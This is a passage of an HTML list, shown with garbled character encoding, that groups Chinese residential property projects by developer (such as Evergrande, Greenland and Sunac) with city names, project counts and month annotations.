ๅฑฑ่ฅฟ็œ-ๅคชๅŽŸๅธ‚-ๆ’ๅคงๆฃฎๆž—ๆตทไธ€ๆœŸ,<br> ๅฑฑ่ฅฟ็œ-ๅคชๅŽŸๅธ‚-ๅคชๅŽŸๅธ‚ๆ’ๅคงๅพกๆ™ฏๆนพ4ๆœŸ,<br> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-่ฅฟๅฎ‰ๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅŸŽ๏ผˆ8ๆœˆ๏ผ‰,<br> ๅ››ๅท็œ-ๆˆ้ƒฝๅธ‚-ๆ’ๅคงๆž—ๆบช้ƒก๏ผˆ8ๆœˆ๏ผ‰,<br> ๅ››ๅท็œ-ๆˆ้ƒฝๅธ‚-ๆ’ๅคง็‰งไบ‘ๅคฉๅณฐ๏ผˆ8ๆœˆ๏ผ‰,<br> ๅ››ๅท็œ-ๆˆ้ƒฝๅธ‚-ๆ’ๅคงๆœชๆฅๅŸŽ4ๆœŸ๏ผˆ7ๆœˆ๏ผ‰,<br> ๅ››ๅท็œ-ๅพท้˜ณๅธ‚-ๆ’ๅคง็ฟก็ฟ ๅŽๅบญ,<br> ๅ››ๅท็œ-ๆณธๅทžๅธ‚-ๆ’ๅคง็ฟก็ฟ ๆนพ,<br> ๅ››ๅท็œ-็œ‰ๅฑฑๅธ‚-ๆ’ๅคงๆ–‡ๅŒ–ๆ—…ๆธธๅŸŽ๏ผˆ10ๆœˆ๏ผ‰,<br> ๅคฉๆดฅๅธ‚-ๆญฆๆธ…ๅŒบ-ๆ’ๅคง็ฟก็ฟ ๆนพ๏ผˆ10ๆœˆ๏ผ‰,<br> ไบ‘ๅ—็œ-ๆ˜†ๆ˜Žๅธ‚-ๆ’ๅคงๅŸŽ๏ผˆ9ๆœˆ๏ผ‰,<br> ไบ‘ๅ—็œ-ๆ˜†ๆ˜Žๅธ‚-ๆ’ๅคง็Ž–็‘ๆนพ๏ผˆ9ๆœˆ๏ผ‰,<br> ไบ‘ๅ—็œ-ๆ˜†ๆ˜Žๅธ‚-ๆ’ๅคง้˜ณๅ…‰ๅŠๅฒ›๏ผˆ9ๆœˆ๏ผ‰ </details> <details> <summary><b> ๆ’ๆณฐ้›†ๅ›ข ใ€2ใ€‘</b></summary> ๆน–ๅ—็œ-้•ฟๆฒ™ๅธ‚-ๆ’ๆณฐ่Š™่“‰ๆ‚ฆๅบœ,<br> ๆฑŸ่‹็œ-่ฟžไบ‘ๆธฏๅธ‚-ๆ’ๆณฐๆ‚ฆ็‘ๅบœ </details> <details> <summary><b> ่กก้˜ณๅธ‚ไบšๆๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-่กก้˜ณๅธ‚-ๅŽๆบๅŒ—่ก— </details> <details> <summary><b> ๅฎไฟก็ฝฎไธš ใ€1ใ€‘</b></summary> ไธŠๆตทๅธ‚-ๆตฆไธœๆ–ฐๅŒบ-ไธŠๆตทๆตฆไธœๆ–ฐๅŒบๅ›ๅพกๅ…ฌ้ฆ† </details> <details> <summary><b> ้ธฟๆตทๅœฐไบง ใ€1ใ€‘</b></summary> ๆฑŸ่ฅฟ็œ-ๅ—ๆ˜Œๅธ‚-้ธฟๆตทๅŸŽ๏ผˆ10ๆœˆ๏ผ‰ </details> <details> <summary><b> ๆน–ๅŒ—่”ไนๅพท่ƒœๆŠ•่ต„็ฎก็†ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅŒ—็œ-ๅ’ธๅฎๅธ‚-่”ไนๅนฟๅœบ </details> <details> <summary><b> ๆน–ๅ—ๅฅฅไฝ“็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-่กกไธœๅŽฟ-ๅฅฅไฝ“ๅ…ฌ้ฆ† </details> <details> <summary><b> ๆน–ๅ—ๅ’Œ่พพๆŠ•่ต„้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-ๆน˜ๆฝญๅธ‚-ๅ’Œ่พพๆปจๆฑŸๅ…ฌๅ›ญ </details> <details> <summary><b> ๆน–ๅ—็บขๆ˜Ÿๅคฉๆˆๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-้•ฟๆฒ™ๅธ‚-้•ฟๆฒ™ๆ–‡ๆ™ฏ </details> <details> <summary><b> ๆน–ๅ—ไนๅŽๅ›ฝ้™…ๆ–ฐๅŸŽๅผ€ๅ‘ๅปบ่ฎพๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-ๆน˜ๆฝญๅธ‚-้‡‘ๅฅฅๆน˜ๆฑŸๅ…ฌ้ฆ† </details> <details> <summary><b> ๆน–ๅ—็œๆน˜ๆฑ‡็ฝฎไธšๅ‘ๅฑ•๏ผˆ้›†ๅ›ข๏ผ‰ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-ๆฐธๅทžๅธ‚-่ˆœๅพทๆน˜ๆฑŸ </details> <details> <summary><b> ่Šฑๆ ทๅนด ใ€1ใ€‘</b></summary> ๆน–ๅŒ—็œ-้„‚ๅทžๅธ‚-้„‚ๅทžๅธ‚่Šฑๆ ทๅนด้ฆ™้—จ็ฌฌ </details> <details> <summary><b> ๅŽๅคๅนธ็ฆ ใ€4ใ€‘</b></summary> ๆฒณๅŒ—็œ-ๅปŠๅŠๅธ‚-ๅŽๅคๅนธ็ฆยทๅ››ๅญฃๅ…ฌ้ฆ†,<br> ๆฒณๅŒ—็œ-ๅปŠๅŠๅธ‚-ๅŽๅคๅนธ็ฆๅญ”้›€ๅŸŽๅคง่ฟๆฒณๆ™บๆ…ง่ก—ๅŒบ๏ผˆ้ฆ™ๆฒณ๏ผ‰,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅญ”้›€ๅŸŽๅ…ฌๅ›ญๆตท,<br> ๆฑŸ่‹็œ-ๅ—ไบฌๅธ‚-้‡‘้™ตๅŽๅคไธญๅฟƒ๏ผˆ8ๆœˆ๏ผ‰ </details> <details> <summary><b> ไฝณๅ…†ไธš ใ€5ใ€‘</b></summary> ้‡ๅบ†ๅธ‚-ๆฒ™ๅชๅๅŒบ-ไฝณๅ…†ไธšยทๅ‡ค้ธฃๆฐดๅฒธ๏ผˆ9ๆœˆ๏ผ‰,<br> ๅนฟไธœ็œ-ๆทฑๅœณๅธ‚-ไฝณๅ…†ไธšๆ—ถไปฃๅคงๅŽฆ,<br> ๅนฟไธœ็œ-ๆทฑๅœณๅธ‚-ไฝณๅ…†ไธšๆจพไผดๅฑฑ,<br> ไธŠๆตทๅธ‚-ๅ˜‰ๅฎšๅŒบ-ๅพ่กŒไฝณๅ…†ไธšไบ”ๆœŸ,<br> ไบ‘ๅ—็œ-ๆ˜†ๆ˜Žๅธ‚-ไฝณๅ…†ไธšๅŸŽๅธ‚ๅนฟๅœบ๏ผˆ9ๆœˆ๏ผ‰ </details> <details> <summary><b> ๅปบไธšๅœฐไบง่‚กไปฝๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้นคๅฃๅธ‚-ๆท‡ๅŽฟๅปบไธšๅŸŽ </details> <details> <summary><b> ๆฑŸ่‹ไธญๅ—ๅปบ่ฎพ้›†ๅ›ข่‚กไปฝๆœ‰้™ๅ…ฌๅธ ใ€3ใ€‘</b></summary> ๅฑฑไธœ็œ-้’ๅฒ›ๅธ‚-ไธญๅ—ๆž—ๆจพๅฐๅŒบ๏ผˆ7ๆœˆ๏ผ‰,<br> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-ไธญๅ—ไธŠๆ‚ฆๅŸŽๅ››ๆœŸ,<br> ๆต™ๆฑŸ็œ-ๆญๅทžๅธ‚-ๆญๅทžไธญๅ—ๆ˜ฅๆบช้›† </details> <details> <summary><b> ๆฑŸ่ฅฟไธญ้‡‘้ป„้‡‘็ ๅฎ็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฑŸ่ฅฟ็œ-ๅ—ๆ˜Œๅธ‚-ไธญ้‡‘ไธญๅฟƒ </details> <details> <summary><b> ้‡‘็ง‘ๅœฐไบง้›†ๅ›ข่‚กไปฝๆœ‰้™ๅ…ฌๅธ ใ€4ใ€‘</b></summary> ้‡ๅบ†ๅธ‚-ๆธๅŒ—ๅŒบ-่Š™่“‰ๅ…ฌ้ฆ†๏ผˆ9ๆœˆ๏ผ‰,<br> ๆฒณๅ—็œ-่ฎธๆ˜Œๅธ‚-้‡‘็ง‘้นฟ้ธฃๅธๆ™ฏ,<br> ่พฝๅฎ็œ-ๆฒˆ้˜ณๅธ‚-้‡‘็ง‘้›†็พŽไธœๆ–น,<br> ๆต™ๆฑŸ็œ-ๅ˜‰ๅ…ดๅธ‚-ๆกไนก้‡‘็ง‘ๆ—ถไปฃๅคฉๆ‚ฆๅฐๅŒบ </details> <details> <summary><b> ้”ฆไธšๅœฐไบง้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-้”ฆไธš6ๅทๅบœ้‚ธ </details> <details> <summary><b> ้”ฆ่‰บ็ฝฎไธš้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€3ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-้”ฆ่‰บ่ฝป็บบๅ››ๆœŸๆœชๆฅๅ…ฌๅฏ“,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-้พ™ๆน–้”ฆ่‰บๅŸŽ้ซ˜ๅ…ญ,<br> ๅ››ๅท็œ-ๅนฟๅฎ‰ๅธ‚-ๅธ่ฐทๅ…ฌๅ›ญๅŸŽไธ‰ๆœŸ </details> <details> <summary><b> ๅฑ…ๆ˜“็ฝฎไธš ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-่ฅ้˜ณๅธ‚-ๅฑ…ๆ˜“่ฅฟ้ƒก </details> <details> <summary><b> ๅบทๆกฅๅœฐไบง้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€8ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-้‡‘ๆฐดๅŒบๅบทๆกฅไธœ้บ“ๅ›ญไบŒๆœŸ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅบทๆกฅ็Ž–็Žบๅ›ญ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅบทๆกฅ้‚ฃไบ‘ๆบช๏ผˆ8ๆœˆ),<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅบทๆกฅๆœชๆฅๅ…ฌๅ…ƒ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅบทๆกฅ้ฆ™ๆบช้ƒก,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅบทๆกฅๆ‚ฆๆบชๅ›ญ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅบทๆกฅ้˜…ๆบช้›…่‹‘,<br> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-่ฅฟๅฎ‰ๅบทๆกฅๆ‚ฆ่“‰ๅ›ญ๏ผˆ9๏ผ‰ </details> <details> <summary><b> ไนๅŽๆ’ไธš้›†ๅ›ข ใ€1ใ€‘</b></summary> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-ไนๅŽๅŸŽ้ฆ™ๆฆญๅบ„ๅ›ญ </details> <details> <summary><b> ้พ™ๅ…‰้›†ๅ›ข ใ€1ใ€‘</b></summary> ๅนฟไธœ็œ-ๆทฑๅœณๅธ‚-ๅ‰ๆตทๅคฉๅขƒ่Šฑๅ›ญ </details> <details> <summary><b> ้พ™ๅฃๅธ‚ไธญๅฎ‡ๆˆฟๅœฐไบงๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅฑฑไธœ็œ-็ƒŸๅฐๅธ‚-ๆพ้šฝ้˜ณๅ…‰ๅŸŽ๏ผˆ12ๆœˆ๏ผ‰ </details> <details> <summary><b> ้š†ๅŸบๆณฐๅ’Œ ใ€4ใ€‘</b></summary> ๆฒณๅŒ—็œ-ไฟๅฎšๅธ‚-้š†ๅŸบๆณฐๅ’Œๆถฟๅทž้“‚ๆ‚ฆๅฑฑ,<br> ๆฒณๅŒ—็œ-ไฟๅฎšๅธ‚-้š†ๅŸบๆณฐๅ’Œๆถฟๅทž็ดซๆ‚ฆๅฐๅŒบ,<br> ๆฒณๅŒ—็œ-ๆฒงๅทžๅธ‚-็ดซๆจพ้ฆ™ๆฆญ,<br> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-ไธ‡ๅ’Œ้ƒก </details> <details> <summary><b> ็ปฟๅœฐ ใ€18ใ€‘</b></summary> ้‡ๅบ†ๅธ‚-ไธ‡ๅทžๅŒบ-ไธ‡่ƒๅŸŽไบŒๆœŸ๏ผˆ12ๆœˆ๏ผ‰,<br> ็”˜่‚ƒ็œ-ๅ…ฐๅทžๅธ‚-ๅ…ฐๅทžๆ–ฐๅŒบ็ปฟๅœฐๆ™บๆ…ง้‡‘่žๅŸŽๅ…ญๆœŸๅบทๅ…ป่ฐท,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-็ปฟๅœฐๆปจๆน–ๅ›ฝ้™…ๅŸŽ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-็ปฟๅœฐๅŸŽไบŒๅŒบ๏ผˆ7ๆœˆ๏ผ‰,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-็ปฟๅœฐๅŸŽไบ”ๆœŸๅ…ญๅŒบ๏ผˆ7ๆœˆ๏ผ‰,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-็ปฟๅœฐๆบฑๆฐดๅฐ้•‡,<br> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-ๅ…‰่ฐท็ปฟๅœฐไธญๅฟƒๅŸŽJKLๅœฐๅ—,<br> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-ๆฑ‰ๅ—็ปฟๅœฐๅŸŽไบŒๆœŸ,<br> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-็ปฟๅœฐๅ…‰่ฐทๆ˜Ÿๆฒณ็ป˜,<br> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-็ปฟๅœฐๅ…‰่ฐทไธญๅฟƒๅŸŽ,<br> ๆน–ๅŒ—็œ-ๅ’ธๅฎๅธ‚-็ปฟๅœฐๅŸŽ้™…็ฉบ้—ด็ซ™,<br> ๆน–ๅ—็œ-ๆ ชๆดฒๅธ‚-็ปฟๅœฐๅŸŽ้™…็ฉบ้—ด็ซ™,<br> ๆฑŸ่ฅฟ็œ-่ตฃๅทžๅธ‚-็ปฟๅœฐๅš่งˆๅŸŽ,<br> ๅฑฑไธœ็œ-้’ๅฒ›ๅธ‚-็ปฟๅœฐๅŸŽ้™…็ฉบ้—ด็ซ™๏ผˆ9ๆœˆ๏ผ‰,<br> ๅฑฑ่ฅฟ็œ-ๅคชๅŽŸๅธ‚-็ปฟๅœฐๆ–ฐ้‡ŒๅŸŽไบŒๆœŸ,<br> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-ๅ›ฝ้™…ๆธฏๅŠกๅŒบ็ปฟๅœฐๅ›ฝๆธฏๆ–ฐ้‡ŒๅŸŽไธ€ๆœŸ๏ผˆๅพ…ๅœ่ดท๏ผ‰,<br> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-็ปฟๅœฐ็’€็’จๅคฉๅŸŽไบŒๆœŸ,<br> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-็ปฟๅœฐๆ–ฐ้‡Œ็จ‹ไธ‰ๆœŸๅ…ฐไบญๅ…ฌ้ฆ† </details> <details> <summary><b> ็พŽๅฅฝ็ฝฎไธš้›†ๅ›ข่‚กไปฝๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆน–ๅŒ—็œ-ๆญฆๆฑ‰ๅธ‚-็พŽๅฅฝ้ฆ™ๅŸŸ่Šฑๅขƒ </details> <details> <summary><b> ๅ้—จๅœฐไบง ใ€4ใ€‘</b></summary> ๆฒณๅ—็œ-ๅ•†ไธ˜ๅธ‚-ๅ้—จๅŸŽไบ”ๆœŸ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅ้—จ็ฟ ๅ›ญ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅ้—จๅคฉๅขƒ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅ้—จ็ดซๅ›ญ </details> <details> <summary><b> ๅ—ๅ……้€ธ่พพ็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅ››ๅท็œ-ๅ—ๅ……ๅธ‚-ๅ—ๅ……้€ธๅˆไธญๅคฎๅ…ฌๅ›ญ๏ผˆ8ๆœˆ๏ผ‰ </details> <details> <summary><b> ๅ—ๅฎๅธ‚็Ž‰ๆกถ้‡‘ๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™่ดฃไปปๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๅ—ๅฎๅธ‚-้‡‘็ง‘ๅš็ฟ ๅฑฑ </details> <details> <summary><b> ๅ†…่’™ๅค้ผŽ่ฏšๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™่ดฃไปปๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๅ†…่’™ๅค่‡ชๆฒปๅŒบ-ๅ‘ผๅ’Œๆตฉ็‰นๅธ‚-้ฆ™ๅข…ๅฒญ่ฅฟๅŒบ๏ผˆ10ๆœˆ๏ผ‰ </details> <details> <summary><b> ๅนณ่ˆ†ๅŽฟ่ฑซไธฐ็ฝฎไธšๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ฉป้ฉฌๅบ—ๅธ‚-ๅนณ่ˆ†ๅŽฟๆน–็€่“ๅฒธ๏ผˆ10ๆœˆ๏ผ‰ </details> <details> <summary><b> ๅ•Ÿ็ฆ็ฝฎไธš่‚กไปฝๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-ๅ•Ÿ็ฆๅŸŽ </details> <details> <summary><b> ๅบ†้˜ณๅธ‚ไธ‡ไธ–ๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ็”˜่‚ƒ็œ-ๅบ†้˜ณๅธ‚-ๅ›ฝ้‡‘one๏ผˆ11ๆœˆ๏ผ‰ </details> <details> <summary><b> ่žๅˆ› ใ€25ใ€‘</b></summary> ้‡ๅบ†ๅธ‚-็’งๅฑฑๅŒบ-็’งๅฑฑๅŒบ่žๅˆ›ๅŸŽ๏ผˆ9ๆœˆ๏ผ‰,<br> ้‡ๅบ†ๅธ‚-ๆธๅŒ—ๅŒบ-่žๅˆ›้šๆบชๆ™“้™ขไธ€ไบŒไธ‰ๆœŸ,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๅŒ—ๆตทๅธ‚-่žๅˆ›ๆตทๆ˜ ๅ…ฐๅฑฟไธ‰ๆœŸ,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๆก‚ๆž—ๅธ‚-ๆก‚ๆž—่žๅˆ›ๆ–‡ๆ—…ๅŸŽN4ๅœฐๅ—,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๆก‚ๆž—ๅธ‚-่žๅˆ›ๆ–‡ๆ—…ๅŸŽN5ๅœฐๅ—๏ผˆ12ๆœˆ๏ผ‰,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๆก‚ๆž—ๅธ‚-่žๅˆ›ๆ–‡ๆ—…ๅŸŽN7ๅœฐๅ—๏ผˆ10ๆœˆ๏ผ‰,<br> ๅนฟ่ฅฟๅฃฎๆ—่‡ชๆฒปๅŒบ-ๅ—ๅฎๅธ‚-่žๅˆ›่žๅ…ฌ้ฆ†11ใ€12ๅทๆฅผ๏ผˆ8ๆœˆ๏ผ‰,<br> ๆฒณๅŒ—็œ-็Ÿณๅฎถๅบ„ๅธ‚-่žๅˆ›ๅŸŽไธ€ๆœŸ๏ผˆ11ๆœˆ๏ผ‰,<br> ๆฒณๅ—็œ-่ฎธๆ˜Œๅธ‚-่žๅˆ›่ง‚ๆฒณๅฎธ้™ข,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-่žๅˆ›ไธญๅŽŸๅคง่ง‚ไบŒๆœŸ,<br> ๆฒณๅ—็œ-้ƒ‘ๅทžๅธ‚-้ƒ‘ๅทž่žๅˆ›ๅพกๆน–ๅฎธ้™ขไธ‰ๆœŸ,<br> ่พฝๅฎ็œ-ๅคง่ฟžๅธ‚-่žๅˆ›ๆตท้€ธ้•ฟๆดฒ,<br> ๅฑฑไธœ็œ-ๆตŽๅ—ๅธ‚-่žๅˆ›ไธญๆ–ฐๅ›ฝ้™…ๅŸŽๅ››ๆœŸๅ—ๅŒบ,<br> ๅฑฑไธœ็œ-้’ๅฒ›ๅธ‚-ๆŽๆฒงๅŒบ่žๅˆ›ๆ‚ฆๅฑฑไบŒๆœŸ,<br> ๅฑฑไธœ็œ-้’ๅฒ›ๅธ‚-้’ๅฒ›ๆตทๆด‹ๆดปๅŠ›ๅŒบ่žๅˆ›ไธญๅฟƒไธ‰ๆœŸ๏ผˆ10ๆœˆ๏ผ‰,<br> ๅฑฑไธœ็œ-้’ๅฒ›ๅธ‚-่ฅฟๆตทๅฒธๆ–ฐๅŒบ่žๅˆ›ๅฝฑ้ƒฝๅญฆๅบœไธ‰ๆœŸ๏ผˆ9ๆœˆ๏ผ‰,<br> ๅฑฑ่ฅฟ็œ-ๅคชๅŽŸๅธ‚-ๅคชๅŽŸๅธ‚่žๅˆ›ไธญๅฟƒ,<br> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-่žๅˆ›ไธœๆ–นๅฎธ้™ขDK5,<br> ้™•่ฅฟ็œ-ๅปถๅฎ‰ๅธ‚-ๅปถๅฎ‰่žๅˆ›ๅฎธ้™ข,<br> ๅ››ๅท็œ-้ƒฝๆฑŸๅ ฐๅธ‚-่žๅˆ›ๆ–‡ๆ—…ๆปจๆฑŸๆ–ฐๅŒบ๏ผˆ8ๆœˆ๏ผ‰,<br> ๅ››ๅท็œ-็œ‰ๅฑฑๅธ‚-็œ‰ๅฑฑๅธ‚ๅฝญๅฑฑๅŒบ่žๅˆ›ๆฐด้ƒกๆœชๆฅๅŸŽ๏ผˆๆฑŸๅฃๆฐด้•‡๏ผ‰๏ผˆ10ๆœˆ๏ผ‰,<br> ๅคฉๆดฅๅธ‚-ๅŒ—่พฐๅŒบ-่žๅˆ›ๆดฅๅฎธๅฃนๅท,<br> ๅคฉๆดฅๅธ‚-ๅŒ—่พฐๅŒบ-่žๅˆ›ๅพกๆ™ฏๅฎธ้™ข,<br> ๅคฉๆดฅๅธ‚-ๅคฉๆดฅๅŸŽๅŒบ-่žๅˆ›ๅ—ๅผ€ๅฎธ้™ขไบŒๆœŸ,<br> ไบ‘ๅ—็œ-ๅคง็†็™ฝๆ—่‡ชๆฒปๅทž-ๅคง็†็š„ๅฐ้™ขๅญๅŒ—ๅŒบ๏ผˆ12ๆœˆ๏ผ‰ </details> <details> <summary><b> ็‘žๆ–ฐ๏ผˆๅนณๆฝญ๏ผ‰ๆŠ•่ต„ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ็ฆๅปบ็œ-็ฆๅทžๅธ‚-ๅนณๆฝญ็ปผๅˆๅฎž้ชŒๅŒบ้‡‘้กบๆ–ฐๅ…‰ๆ˜ŽๅŸŽ๏ผˆ9ๆœˆ๏ผ‰ </details> <details> <summary><b> ไธ‰็››ๆŽง่‚ก๏ผˆ้›†ๅ›ข๏ผ‰ๆœ‰้™ๅ…ฌๅธ ใ€3ใ€‘</b></summary> ๆฑŸ่‹็œ-ๅธธๅทžๅธ‚-ไธ‰็››็’žๆ‚ฆๆนพ,<br> ๅฑฑไธœ็œ-้’ๅฒ›ๅธ‚-ไธ‰็››ๅ›ฝ้™…ๆตทๅฒธไบ”ๆœŸ๏ผˆ9ๆœˆ๏ผ‰,<br> ๅ››ๅท็œ-ๆˆ้ƒฝๅธ‚-ไธ‰็››็ฟกไฟชๅฑฑ๏ผˆ8ๆœˆ๏ผ‰ </details> <details> <summary><b> ๅฑฑๆน–ๆตท้›†ๅ›ข ใ€1ใ€‘</b></summary> ๆน–ๅ—็œ-ๅธธๅพทๅธ‚-ๆฑ‰ๅฏฟๅŽฟๅฑฑๆน–ๆตทไธŠๅŸŽไบŒๆœŸใ€ไธ‰ๆœŸ </details> <details> <summary><b> ้™•่ฅฟๅฎๆถฆๅฎžไธš้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-ๅ›ฝ้™…ๅนธ็ฆๅŸŽ </details> <details> <summary><b> ไธŠๆตทๆตทไธœๆˆฟๅœฐไบงๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ไธŠๆตทๅธ‚-ๆตฆไธœๆ–ฐๅŒบ-ไธดๆธฏไธ‡็ฅฅ้ขๆ™ฏๅ›ญๆฑŸๅ—้™ข </details> <details> <summary><b> ไธŠๆตทๅ…ดๅฎธๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ไธŠๆตทๅธ‚-ๆตฆไธœๆ–ฐๅŒบ-ๅ‘จๆตฆๅˆๅฏŒๅนฟๅœบ </details> <details> <summary><b> ็Ÿณๅฎถๅบ„ไธญ่žๆฑ‡้€šๆˆฟๅœฐไบงๅผ€ๅ‘ๆœ‰้™ๅ…ฌๅธ ใ€1ใ€‘</b></summary> ๆฒณๅŒ—็œ-็Ÿณๅฎถๅบ„ๅธ‚-็Ÿณๅฎถๅบ„่ตซ็Ÿณๅบœ </details> <details> <summary><b> ๅฎžๅœฐๅœฐไบง้›†ๅ›ขๆœ‰้™ๅ…ฌๅธ ใ€7ใ€‘</b></summary> ๆฒณๅ—็œ-ๅฎ‰้˜ณๅธ‚-็ดซ่–‡ๅ…ฌ้ฆ†,<br> ๆน–ๅŒ—็œ-่†้—จๅธ‚-ๅฎžๅœฐ็ดซ่–‡้›…่‘—,<br> ๅฑฑไธœ็œ-้’ๅฒ›ๅธ‚-ๅฎžๅœฐ่”ท่–‡ๅ›ฝ้™…,<br> ๅคฉๆดฅๅธ‚-ๅฎๅปๅŒบ-ๅฎๅปๅŒบๅฎžๅœฐๆตทๆฃ ้›…่‘—ๅœฃๆ™ฏ่ฑชๅบญ,<br> ๅคฉๆดฅๅธ‚-ๅคฉๆดฅๅŸŽๅŒบ-ๅฎžๅœฐๆตทๆฃ ้›…่‘—ๅœฃๆ™ฏ่ฑชๅบญ๏ผˆ8ๆœˆ๏ผ‰,<br> ๅคฉๆดฅๅธ‚-ๅคฉๆดฅๅŸŽๅŒบ-ๅฎžๅœฐ่”ท่–‡๏ผˆ9ๆœˆ๏ผ‰,<br> ไบ‘ๅ—็œ-ๆ˜†ๆ˜Žๅธ‚-ๅฎžๅœฐ่Šฑ้นค็ฟŽ๏ผˆ10ๆœˆ๏ผ‰ </details> <details> <summary><b> ไธ–่Œ‚้›†ๅ›ข ใ€5ใ€‘</b></summary> ้‡ๅบ†ๅธ‚-ๅทดๅ—ๅŒบ-ไธ–่Œ‚ยทๆฑŸๅŸŽ้“ญ่‘—,<br> ็ฆๅปบ็œ-็ฆๅทžๅธ‚-ไธ–่Œ‚ๆณฐ็ฆพ้’ไบ‘ๅฐ้•‡๏ผˆ9ๆœˆ๏ผ‰,<br> ๆฑŸ่ฅฟ็œ-ๅ—ๆ˜Œๅธ‚-ไธ–่Œ‚ๆณฐ็ฆพๅ—ๆ˜Œ้™ขๅญ,<br> ๅฑฑไธœ็œ-้’ๅฒ›ๅธ‚-่ฅฟๆตทๅฒธๆ–ฐๅŒบไธ–่Œ‚โ€ข้ฆ™ๅฅˆๅ…ฌ้ฆ†๏ผˆ10ๆœˆ๏ผ‰,<br> ้™•่ฅฟ็œ-่ฅฟๅฎ‰ๅธ‚-ไธ–่Œ‚็’€็’จๅ€พๅŸŽไบŒๆœŸ๏ผˆ7ๆœˆ๏ผ‰ </details> <details> <summary><b> ๅ››ๅท่“ๅ…‰ๅ‘ๅฑ•่‚กไปฝๆœ‰้™ๅ…ฌๅธ ใ€5ใ€‘</b></summary> ้‡ๅบ†ๅธ‚-ๆธๅŒ—ๅŒบ-่“ๅ…‰ๆœชๆฅๅŸŽ,<br> 